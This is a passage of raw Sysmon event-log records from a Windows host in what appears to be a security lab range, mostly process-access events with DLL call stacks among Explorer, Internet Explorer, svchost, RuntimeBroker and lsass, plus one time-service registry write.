10341000x800000000000000013635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:18.672{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0x1d56e1eb) 10341000x800000000000000013658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:19.932{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:19.916{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:19.916{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:20.100{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:20.100{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.990{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.225{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.209{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.209{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000013667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:22.053{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:22.053{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1